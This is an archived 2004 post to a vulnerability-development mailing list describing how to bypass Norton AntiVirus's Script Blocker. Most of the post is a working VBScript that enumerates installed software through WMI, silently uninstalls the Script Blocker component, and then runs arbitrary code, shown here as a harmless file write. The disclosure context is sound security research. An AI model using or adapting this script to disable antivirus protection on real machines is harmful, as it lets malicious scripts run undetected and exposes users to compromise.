Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:




Vulnerability Development mailing list archives

Norton Anti Virus Script Blocker bypass using script(vb,js,...) II
From: <vozzie () gmail com>
Date: 16 Jul 2004 05:09:14 -0000



what i forgot to say in previous post,...

if you start the script with killing Norton AV it's Script Blocker, then Script Blocker will not warn anymore when 
script is about to use 'dangerous' objects,...

' get wmi
set wmi=GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
' enum soft
for each e in wmi.ExecQuery("Select * from Win32_Product")
        on error resume next
        ' uninstall script blocker part of norton
        if instr(e.name,"Script") and instr(e.name,"Block") then
                e.UnInstall()
        end if
next

' just do what you like
set fso = createobject("scripting.filesystemobject")
fso.createtextfile("c:\byenav.txt").write "=)"

norton will still work, only the script blocker will appear dead in the window,....



  By Date           By Thread  

Current thread:
  • Norton Anti Virus Script Blocker bypass using script(vb,js,...) II vozzie (Jul 16)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]